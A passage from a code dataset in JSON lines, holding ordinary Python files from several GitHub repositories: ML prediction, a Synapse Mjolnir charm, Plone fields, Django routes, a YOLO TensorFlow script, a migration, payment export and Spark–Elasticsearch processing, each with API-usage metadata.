"usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 67, "usage_type": "name"}, {"api_name": "PIL.ImageOps.expand", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 75, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 88, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "31627190353", "text": "# Built-in imports\nimport os\nimport sys\nimport argparse\nfrom datetime import datetime\n\n# External imports\nimport pickle\nimport pandas as pd\n\n# Own imports\nimport get_path_dir as gpd\n\n# Define some important directories\nMODEL_DIR = os.path.join(\n gpd.get_desired_folder_path(\"01_introduction\"), \n \"models\"\n)\nDATA_DIR = gpd.get_desired_folder_path(\"data\")\n\nwith open(os.path.join(MODEL_DIR,'lin_reg.bin'), 'rb') as f_in:\n dv, lr = pickle.load(f_in)\n\nCATEGORICAL = ['PUlocationID', 'DOlocationID']\n\ndef read_data(filename:str) -> pd.DataFrame:\n df = pd.read_parquet(filename)\n \n df['duration'] = df[\"dropOff_datetime\"] - df[\"pickup_datetime\"]\n df['duration'] = df[\"duration\"].dt.total_seconds() / 60\n\n df = df[(df[\"duration\"] >= 1) & (df[\"duration\"] <= 60)]\n\n df[CATEGORICAL] = df[CATEGORICAL].fillna(-1).astype('float').astype('str')\n \n return df\n\ndef predict(df: pd.DataFrame) -> pd.DataFrame:\n dicts = df[CATEGORICAL].to_dict(orient='records')\n X_val = dv.transform(dicts)\n y_pred = lr.predict(X_val)\n\n df_resulted = pd.DataFrame()\n df_resulted['ride_id'] = f'{datetime.today().year:04d}/{datetime.today().month:02d}_' + df.index.astype('str')\n df_resulted[\"predictions\"] = y_pred\n\n return df_resulted\n\ndef save_predictions(df:pd.DataFrame, year:int, month:int) -> None:\n df.to_parquet(\n os.path.join(\n DATA_DIR,\n \"predictions\",\n f\"{datetime.today()}-fhv_tripdata_{year}-{int(month):02d}.parquet\"\n ),\n engine='pyarrow',\n compression=None,\n index=False\n )\n\ndef main():\n arg_fmt = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__\n )\n required = parser.add_argument_group('required arguments')\n required.add_argument(\n '-y', '--year', dest='year', required=True,\n help='The year associated to the dataset that is going to be used to make the predictions'\n )\n required.add_argument(\n '-m', '--month', dest='month', required=True, choices=[str(x) for x in range(1,13)],\n help='The month associated to the dataset that is going to be used to make the predictions'\n )\n\n args = parser.parse_args()\n\n print(\"Making the predictions ... \")\n \n try:\n df = read_data(os.path.join(DATA_DIR, f\"fhv_tripdata_{args.year}-{int(args.month):02d}.parquet\"))\n predictions = predict(df)\n save_predictions(predictions, args.year, args.month)\n print(f\"The mean predicted duration is {predictions['predictions'].mean()}\")\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n", "repo_name": "Elkinmt19/ml-engineering-dojo", "sub_path": "mlops/mlops-zoomcamp/04_deployment/scripts/ride-duration.py.py", "file_name": "ride-duration.py.py", "file_ext": "py", "file_size_in_byte": 2689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "get_path_dir.get_desired_folder_path", "line_number": 16, "usage_type": "call"}, {"api_name": "get_path_dir.get_desired_folder_path", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_parquet", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "name"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 62, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "6586311337", "text": "import logging\nimport typing\n\nimport ops\n\nimport actions\nimport synapse\nfrom charm_state import CharmState\n\nlogger = logging.getLogger(__name__)\n\nMJOLNIR_SERVICE_NAME = \"mjolnir\"\nUSERNAME = \"moderator\"\n\n\nclass Mjolnir(ops.Object): # pylint: disable=too-few-public-methods\n \"\"\"A class representing the Mjolnir plugin for Synapse application.\n\n Mjolnir is a moderation tool for Matrix to be used to protect your server from malicious\n invites, spam messages etc.\n See https://github.com/matrix-org/mjolnir/ for more details about it.\n \"\"\"\n\n def __init__(self, charm: ops.CharmBase, charm_state: CharmState):\n \"\"\"Initialize a new instance of the Mjolnir class.\n\n Args:\n charm: The charm object that the Mjolnir instance belongs to.\n charm_state: Instance of CharmState.\n \"\"\"\n super().__init__(charm, \"mjolnir\")\n self._charm = charm\n self._charm_state = charm_state\n self.framework.observe(charm.on.collect_unit_status, self._on_collect_status)\n\n @property\n def _pebble_service(self) -> typing.Any:\n \"\"\"Return instance of pebble service.\n\n Returns:\n instance of pebble service or none.\n \"\"\"\n return getattr(self._charm, \"pebble_service\", None)\n\n @property\n def _admin_access_token(self) -> typing.Optional[str]:\n \"\"\"Get admin access token.\n\n Returns:\n admin access token or None if fails.\n \"\"\"\n get_admin_access_token = getattr(self._charm, \"get_admin_access_token\", None)\n if not get_admin_access_token:\n logging.error(\"Failed to get method get_admin_access_token.\")\n return None\n return get_admin_access_token()\n\n def _on_collect_status(self, event: ops.CollectStatusEvent) -> None:\n \"\"\"Collect status event handler.\n\n Args:\n event: Collect status event.\n \"\"\"\n if not self._charm_state.synapse_config.enable_mjolnir:\n return\n container = self._charm.unit.get_container(synapse.SYNAPSE_CONTAINER_NAME)\n if not container.can_connect():\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for pebble\")\n return\n mjolnir_service = container.get_services(MJOLNIR_SERVICE_NAME)\n if mjolnir_service:\n logger.debug(\"%s service already exists, skipping\", MJOLNIR_SERVICE_NAME)\n return\n synapse_service = container.get_services(synapse.SYNAPSE_SERVICE_NAME)\n synapse_not_active = [\n service for service in synapse_service.values() if not service.is_running()\n ]\n if not synapse_service or synapse_not_active:\n # The get_membership_room_id does a call to Synapse API in order to get the\n # membership room id. This only works if Synapse is running so that's why\n # the service status is checked here.\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for Synapse\")\n return\n if not self._admin_access_token:\n self._charm.unit.status = ops.MaintenanceStatus(\n \"Failed to get admin access token. Please, check the logs.\"\n )\n return\n try:\n if self.get_membership_room_id(self._admin_access_token) is None:\n status = ops.BlockedStatus(\n f\"{synapse.MJOLNIR_MEMBERSHIP_ROOM} not found and \"\n \"is required by Mjolnir. Please, check the logs.\"\n )\n interval = self._charm.model.config.get(\"update-status-hook-interval\", \"\")\n logger.error(\n \"The Mjolnir configuration will be done in %s after the room %s is created.\"\n \"This interval is set in update-status-hook-interval model config.\",\n interval,\n synapse.MJOLNIR_MEMBERSHIP_ROOM,\n )\n event.add_status(status)\n return\n except synapse.APIError as exc:\n logger.exception(\n \"Failed to check for membership_room. Mjolnir will not be configured: %r\",\n exc,\n )\n return\n self.enable_mjolnir(self._admin_access_token)\n event.add_status(ops.ActiveStatus())\n\n def get_membership_room_id(self, admin_access_token: str) -> typing.Optional[str]:\n \"\"\"Check if membership room exists.\n\n Args:\n admin_access_token: not empty admin access token.\n\n Returns:\n The room id or None if is not found.\n \"\"\"\n return synapse.get_room_id(\n room_name=synapse.MJOLNIR_MEMBERSHIP_ROOM, admin_access_token=admin_access_token\n )\n\n def enable_mjolnir(self, admin_access_token: str) -> None:\n \"\"\"Enable mjolnir service.\n\n The required steps to enable Mjolnir are:\n - Get an admin access token.\n - Check if the MJOLNIR_MEMBERSHIP_ROOM room is created.\n -- Only users from there will be allowed to join the management room.\n - Create Mjolnir user or get its access token if already exists.\n - Create the management room or get its room id if already exists.\n -- The management room will allow only members of MJOLNIR_MEMBERSHIP_ROOM room to join it.\n - Make the Mjolnir user admin of this room.\n - Create the Mjolnir configuration file.\n - Override Mjolnir user rate limit.\n - Finally, add Mjolnir pebble layer.\n\n Args:\n admin_access_token: not empty admin access token.\n \"\"\"\n container = self._charm.unit.get_container(synapse.SYNAPSE_CONTAINER_NAME)\n if not container.can_connect():\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for pebble\")\n return\n self._charm.model.unit.status = ops.MaintenanceStatus(\"Configuring Mjolnir\")\n mjolnir_user = actions.register_user(\n container,\n USERNAME,\n True,\n admin_access_token,\n str(self._charm_state.synapse_config.server_name),\n )\n mjolnir_access_token = mjolnir_user.access_token\n room_id = synapse.get_room_id(\n room_name=synapse.MJOLNIR_MANAGEMENT_ROOM, admin_access_token=admin_access_token\n )\n if room_id is None:\n logger.info(\"Room %s not found, creating\", synapse.MJOLNIR_MANAGEMENT_ROOM)\n room_id = synapse.create_management_room(admin_access_token=admin_access_token)\n # Add the Mjolnir user to the management room\n synapse.make_room_admin(\n user=mjolnir_user,\n server=str(self._charm_state.synapse_config.server_name),\n admin_access_token=admin_access_token,\n room_id=room_id,\n )\n synapse.create_mjolnir_config(\n container=container, access_token=mjolnir_access_token, room_id=room_id\n )\n synapse.override_rate_limit(\n user=mjolnir_user,\n admin_access_token=admin_access_token,\n charm_state=self._charm_state,\n )\n self._pebble_service.replan_mjolnir(container)\n self._charm.model.unit.status = ops.ActiveStatus()\n", "repo_name": "canonical/synapse-operator", "sub_path": "src/mjolnir.py", "file_name": "mjolnir.py", "file_ext": "py", "file_size_in_byte": 7219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "ops.Object", "line_number": 16, "usage_type": "attribute"}, {"api_name": "ops.CharmBase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "charm_state.CharmState", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "attribute"}, {"api_name": "ops.CollectStatusEvent", "line_number": 58, "usage_type": "attribute"}, {"api_name": "synapse.SYNAPSE_CONTAINER_NAME", "line_number": 66, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 68, "usage_type": "call"}, {"api_name": "synapse.SYNAPSE_SERVICE_NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 82, "usage_type": "call"}, {"api_name": "ops.MaintenanceStatus", "line_number": 85, "usage_type": "call"}, {"api_name": "ops.BlockedStatus", "line_number": 91, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 92, "usage_type": "attribute"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 100, "usage_type": "attribute"}, {"api_name": "synapse.APIError", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ops.ActiveStatus", "line_number": 111, "usage_type": "call"}, {"api_name": "synapse.get_room_id", "line_number": 122, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 123, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 113, "usage_type": "attribute"}, {"api_name": "synapse.SYNAPSE_CONTAINER_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 146, "usage_type": "call"}, {"api_name": "ops.MaintenanceStatus", "line_number": 148, "usage_type": "call"}, {"api_name": "actions.register_user", "line_number": 149, "usage_type": "call"}, {"api_name": "synapse.get_room_id", "line_number": 157, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MANAGEMENT_ROOM", "line_number": 158, "usage_type": "attribute"}, {"api_name": "synapse.MJOLNIR_MANAGEMENT_ROOM", "line_number": 161, "usage_type": "attribute"}, {"api_name": "synapse.create_management_room", "line_number": 162, "usage_type": "call"}, {"api_name": "synapse.make_room_admin", "line_number": 164, "usage_type": "call"}, {"api_name": "synapse.create_mjolnir_config", "line_number": 170, "usage_type": "call"}, {"api_name": "synapse.override_rate_limit", "line_number": 173, "usage_type": "call"}, {"api_name": "ops.ActiveStatus", "line_number": 179, "usage_type": "call"}]} +{"seq_id": "12692049126", "text": "# -*- coding: utf-8 -*-\n\nfrom DateTime import DateTime\nfrom DateTime.interfaces import DateTimeError\nfrom Products.CMFPlone import utils\nfrom collective.tablepage.fields.base import BaseField\nfrom collective.tablepage.fields.base import BaseFieldDataRetriever\nfrom collective.tablepage.fields.interfaces import IDateTimeColumnField\nfrom zope.component import getMultiAdapter\nfrom zope.interface import implements\n\ntry:\n from zope.browserpage.viewpagetemplatefile import ViewPageTemplateFile\nexcept ImportError:\n # Plone < 4.1\n from zope.app.pagetemplate.viewpagetemplatefile import ViewPageTemplateFile\n\n\nclass DateTimeField(BaseField):\n \"\"\"A field that store date-time formatted string\"\"\"\n implements(IDateTimeColumnField)\n\n edit_template = ViewPageTemplateFile('templates/datetime.pt')\n view_template = ViewPageTemplateFile('templates/string_view.pt')\n\n show_hm = True\n\n @classmethod\n def RealIndexIterator(csl):\n # Plone 3 compatibility\n return utils.RealIndexIterator(pos=0)\n\n def render_view(self, data, index=None, storage=None):\n self.data = data or ''\n if self.data:\n try:\n date = DateTime(self.data)\n ploneview = getMultiAdapter((self.context, self.request), name=u'plone')\n self.data = ploneview.toLocalizedTime(date, long_format=self.show_hm)\n except DateTimeError:\n self.data = ''\n return self.view_template(data=self.data)\n\n\nclass DateField(DateTimeField):\n \"\"\"A field that store date formatted string\"\"\"\n show_hm = False\n\n\nclass DateTimeDataRetriever(BaseFieldDataRetriever):\n \"\"\"Get data from the request, return it as a date\"\"\"\n\n show_hm = True\n\n def __init__(self, context):\n self.context = context\n self.configuration = None\n\n def get_from_request(self, name, request):\n \"\"\"Return data only if is a real date formatted string\"\"\"\n \n datestr = \"%(year)s/%(month)s/%(day)s\" % {'year': request.get(\"%s_year\" % name),\n 'month': request.get(\"%s_month\" % name),\n 'day': request.get(\"%s_day\" % name),\n }\n if self.show_hm:\n timestr = \" %(hour)s:%(minute)s:00\" % {'hour': request.get(\"%s_hour\" % name),\n 'minute': request.get(\"%s_minute\" % name),\n }\n else:\n timestr = ' 00:00:00'\n datestr += timestr\n\n try:\n return {name: DateTime(datestr).strftime('%Y/%m/%d %H:%M:%S')}\n except DateTimeError:\n pass\n return {name: None}\n\n def data_for_display(self, data, backend=False, row_index=None):\n \"\"\"Return the data formatted in the propert locales format\"\"\"\n if backend:\n return data \n ploneview = getMultiAdapter((self.context, self.context.REQUEST), name=u'plone')\n return ploneview.toLocalizedTime(data, long_format=self.show_hm)\n\n def data_to_storage(self, data):\n \"\"\"Try to convert data to a DateTime\"\"\"\n data = data and data.strip() or ''\n try:\n DateTime(data)\n except DateTimeError:\n return None\n return data\n\n\nclass DateDataRetriever(DateTimeDataRetriever):\n show_hm = False\n", "repo_name": "collective/collective.tablepage", "sub_path": "collective/tablepage/fields/date_time.py", "file_name": "date_time.py", "file_ext": "py", "file_size_in_byte": 3425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collective.tablepage.fields.base.BaseField", "line_number": 19, "usage_type": "name"}, {"api_name": "zope.interface.implements", "line_number": 21, "usage_type": "call"}, {"api_name": "collective.tablepage.fields.interfaces.IDateTimeColumnField", "line_number": 21, "usage_type": "argument"}, {"api_name": "zope.app.pagetemplate.viewpagetemplatefile.ViewPageTemplateFile", "line_number": 23, "usage_type": "call"}, {"api_name": "zope.app.pagetemplate.viewpagetemplatefile.ViewPageTemplateFile", "line_number": 24, "usage_type": "call"}, {"api_name": "Products.CMFPlone.utils.RealIndexIterator", "line_number": 31, "usage_type": "call"}, {"api_name": "Products.CMFPlone.utils", "line_number": 31, "usage_type": "name"}, {"api_name": "DateTime.DateTime", "line_number": 37, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 38, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 40, "usage_type": "name"}, {"api_name": "collective.tablepage.fields.base.BaseFieldDataRetriever", "line_number": 50, "usage_type": "name"}, {"api_name": "DateTime.DateTime", "line_number": 75, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 76, "usage_type": "name"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 84, "usage_type": "call"}, {"api_name": "DateTime.DateTime", "line_number": 91, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "29151949248", "text": "# urls.py\n\nfrom django.urls import path\nfrom backend_api.views import UserRegistrationView, UserLoginView, UserProfileView,SortedInputView,AllInputView\n\nurlpatterns = [\n path('register/', UserRegistrationView.as_view(), name='user-registration'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view()),\n path('searchinput/', SortedInputView.as_view()),\n path('allinput/', AllInputView.as_view()),\n\n]\n", "repo_name": "nusratdevo/evident_search_app", "sub_path": "backend/backend_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "backend_api.views.UserRegistrationView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "backend_api.views.UserRegistrationView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "backend_api.views.UserLoginView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "backend_api.views.UserLoginView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "backend_api.views.UserProfileView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "backend_api.views.UserProfileView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "backend_api.views.SortedInputView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "backend_api.views.SortedInputView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "backend_api.views.AllInputView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "backend_api.views.AllInputView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "24285623584", "text": "import tensorflow as tf\nimport cv2\nimport numpy as np\n\n\ngraph_def = 'weights/yolov3.pb'\n\nwith tf.gfile.GFile(graph_def, \"rb\") as f:\n restored_graph_def = tf.GraphDef()\n restored_graph_def.ParseFromString(f.read())\n\n# for node in restored_graph_def.node:\n# if 'transpose' in node.name.lower():\n# print(node.name, node.op)\ntf.import_graph_def(\n restored_graph_def,\n input_map=None,\n return_elements=None,\n name=\"\")\n\nimg = cv2.imread('data/samples/bus.jpg')\nimg = cv2.resize(img, (416, 416))\nimg = img[None, :, :, :]\nimg = np.transpose(img, [0, 3, 1, 2])\n\nwith tf.Session() as sess:\n pred = sess.run(\"concat_84:0\", feed_dict={'input.1:0':img})\n\nprint(pred)\n\n# writer = tf.summary.FileWriter(\"./graph\", graph) \n# writer.close()\n\n\n", "repo_name": "zldrobit/onnx_tflite_yolov3", "sub_path": "tf_infer.py", "file_name": "tf_infer.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 69, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tensorflow.gfile.GFile", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tensorflow.GraphDef", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "6679796848", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Administrator'\nfrom ..models import User,Activity,Balance_Flow,User_User_Balance\nfrom datetime import datetime as DateTime\ndef user_join_activity(user=User,activity=Activity):\n now=DateTime.now()\n #过了某个时间就不能报��\n if now>activity.participate_deadline:\n return (False,'too late')\n current_participants=len(activity.participants)\n if current_participants==activity.max_participant:\n return (False,'no rooms')\n min_pay=activity.total_cost_expected/ ( activity.min_participant if current_participants<=activity.min_participant else current_participants)\n if user.user_acount.balance=0.7.1',\n ],\n download_url=DOWNLOAD_URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n license=LICENSE,\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python',\n 'Topic :: Mathematics',\n 'Operating System :: Unix',\n 'Operating System :: MacOS'\n ],\n)\n", "repo_name": "Jim-Holmstroem/AKS-Test", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "72598167643", "text": "\"\"\"empty message\n\nRevision ID: c3a4b4794f06\nRevises: \nCreate Date: 2023-04-06 03:19:46.147777\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'c3a4b4794f06'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('products', sa.Column('product_name', sa.String(length=200), nullable=True))\n op.drop_column('products', 'productname')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('products', sa.Column('productname', mysql.VARCHAR(length=200), nullable=True))\n op.drop_column('products', 'product_name')\n # ### end Alembic commands ###\n", "repo_name": "yqliu776/systerm-dsmanager", "sub_path": "migrations/versions/c3a4b4794f06_.py", "file_name": "c3a4b4794f06_.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "30243680368", "text": "from django.conf import settings\n\nfrom webapp.apps.external_api import constants\nfrom webapp.apps import code_generator\nfrom core import models as core_models\nfrom collections import OrderedDict\n\nimport logging\nfrom datetime import date\nimport os\n\nlogger = logging.getLogger(\"default\")\n\nclass BillDeskPayment(object):\n \n def createOutputFile(self, name):\n base_dir = os.path.dirname(os.path.dirname(__file__)).replace('/webapp/apps/external_api', '')\n output_path = base_dir + '/webapp/static/'\n outfile = open(output_path + name, \"w\")\n return outfile, output_path + name\n\n def generateBSEUploadFile(self, txns):\n from payment import models as payment_models\n\n dt_today_str = date.today().strftime(\"%d%m%Y\")\n out_filename = 'FW_FUN_' + dt_today_str + '.txt'\n out_file, out_filepath = self.createOutputFile(out_filename)\n \n missing_order_ids = []\n for pay in txns:\n if pay.txn_status == payment_models.Transaction.Status.Success:\n order_details = core_models.OrderDetail.objects.filter(transaction=pay)\n \n for order in order_details:\n for fund_order_item in order.fund_order_items.all():\n if int(fund_order_item.order_amount) > 0:\n if not fund_order_item.bse_transaction_id:\n missing_order_ids.append(fund_order_item)\n else:\n bse_order_dict = OrderedDict([('ORDER DATE', fund_order_item.modified_at.strftime('%d/%m/%Y')), \n ('Order ID', str(fund_order_item.bse_transaction_id)),\n ('Client Code', str(pay.user.finaskus_id)),\n ('Order Val AMOUNT', str(fund_order_item.order_amount))])\n out_file.write(\"|\".join(bse_order_dict.values()))\n out_file.write(\"\\r\")\n bse_order_dict.clear()\n \n out_file.close()\n if len(missing_order_ids) > 0:\n return missing_order_ids, \"MISSING_BSE_ORDER_ID\"\n \n return \"webapp/static/\" + os.path.basename(out_filepath), None\n \n def generateBSEUploadFileForDate(self, paydate):\n from payment import models as payment_models\n \n self.paydate = paydate\n payments = payment_models.Transaction.objects.filter(txn_time__month=self.pay_date.month, txn_time__day=self.pay_date.day,\n txn_time__year = self.pay_date.year, txn_status=payment_models.Transaction.Status.Success)\n \n return self.generateBSEUploadFile(payments)\n\n\n# transaction = Payment(constants.GET_PASSWORD_URL)\n# passkey = code_generator(8)\n# transaction.get_encrypted_password(settings.BSE_DEMO_USERID, settings.BSE_DEMO_MEMBERID, settings.BSE_DEMO_PASSWORD, passkey)\n", "repo_name": "webclinic017/backend", "sub_path": "webapp/apps/external_api/bse/billdesk_payment.py", "file_name": "billdesk_payment.py", "file_ext": "py", "file_size_in_byte": 3054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 25, "usage_type": "name"}, {"api_name": "payment.models.Transaction", "line_number": 31, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 31, "usage_type": "name"}, {"api_name": "core.models.OrderDetail.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "core.models.OrderDetail", "line_number": 32, "usage_type": "attribute"}, {"api_name": "core.models", "line_number": 32, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "payment.models.Transaction.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "payment.models.Transaction", "line_number": 58, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 58, "usage_type": "name"}, {"api_name": "payment.models.Transaction", "line_number": 59, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "36019250245", "text": "#MAIN_DATA_CURATION--------run it with spark-submit \nimport time\nfrom elasticsearch import Elasticsearch\nfrom pyspark.sql import SQLContext, SparkSession\nfrom pyspark.sql.functions import col\nfrom spark_functions import elastic2df, df2elastic\nstart_time = time.time()\n\n#spark connexion\nsc = SparkSession.builder.appName(\"sensors processing\").getOrCreate()\nsqlContext = SQLContext(sc)\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n#---------------------ELASTIC 2 SPARK-----------------------------#\n\n#elasticsearch variables\nindex = \"clean_sensors\"\nindex_output = \"curated_sensors\"\ndoc_type = \"IoT\" \n\n#spark processing: delete strange float values on results (86 records)\ndf = elastic2df(es,index,doc_type)\ndf_float = df.select(col('bike'),\n\t\t\t\t\tcol('location'),\n\t\t\t\t\tdf.result.cast('float').alias('result'),\n\t\t\t\t\tcol('sampling_time'), \n\t\t\t\t\tcol('variable'))\ndf_curation = df_float.where('result is not null')\n\ndf2elastic(es,index_output,doc_type,df_curation)\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#---------------------------PIVOTING-----------------------------------#\n#elasticsearch 